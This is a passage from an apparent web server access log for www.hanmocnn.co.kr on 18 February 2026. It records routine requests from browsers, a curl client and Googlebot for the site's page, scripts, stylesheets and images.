(KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:09 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:10 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:10 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:06:20:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:07:03:09 +0000] - - 301 - HEAD http www.hanmocnn.co.kr "/" [Client 51.159.107.135] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "curl/7.81.0" "-" -[18/Feb/2026:07:03:10 +0000] - 200 200 - HEAD https www.hanmocnn.co.kr "/" [Client 51.159.107.135] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "curl/7.81.0" "-" -[18/Feb/2026:07:03:10 +0000] - - 400 - HEAD http www.hanmocnn.co.kr "/" [Client 51.159.107.135] [Length 0] [Gzip -] [Sent-to ] "curl/7.81.0" "-" -[18/Feb/2026:07:03:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 51.159.107.135] [Length 10497] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" -[18/Feb/2026:07:03:13 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 51.159.107.135] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 51.159.107.135] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 51.159.107.135] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 51.159.107.135] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:19 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 51.159.107.135] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" -[18/Feb/2026:07:03:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico/ads.txt" [Client 51.159.107.135] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" -[18/Feb/2026:07:03:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico/app-ads.txt" [Client 51.159.107.135] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" -[18/Feb/2026:07:03:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico/sellers.json" [Client 51.159.107.135] [Length 189] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 51.159.107.135] [Length 401230] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 51.159.107.135] [Length 352184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 51.159.107.135] [Length 347164] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 51.159.107.135] [Length 308187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 51.159.107.135] [Length 289503] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 51.159.107.135] [Length 315872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 51.159.107.135] [Length 273944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:03:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 51.159.107.135] [Length 273944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:50:55 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:57:19 +0000] - - 301 - GET http www.hanmocnn.co.kr "/robots.txt" [Client 66.249.66.32] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:57:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/robots.txt" [Client 66.249.66.169] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:57:20 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.76] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:57:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.193] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:58:20 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.78] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:58:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.169] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:58:21 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.2] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:58:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.169] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:58:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 66.249.66.193] [Length 10510] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:07:58:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 66.249.66.15] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Googlebot-Image/1.0" "-" -[18/Feb/2026:07:58:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 66.249.66.2] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 66.249.66.160] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 66.249.66.15] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 66.249.66.194] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 66.249.66.38] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 66.249.66.15] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 66.249.66.160] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 66.249.66.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:07:58:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/favicon.ico" [Client 66.249.66.15] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "Googlebot-Image/1.0" "-" -[18/Feb/2026:09:12:21 +0000] - - 301 - GET http www.hanmocnn.co.kr "/" [Client 66.249.66.78] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10545] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:30 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/images/icons/icons.svg" [Client 222.117.41.51] [Length 178] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:02:31 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10546] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.google.com/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[18/Feb/2026:11:03:40 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 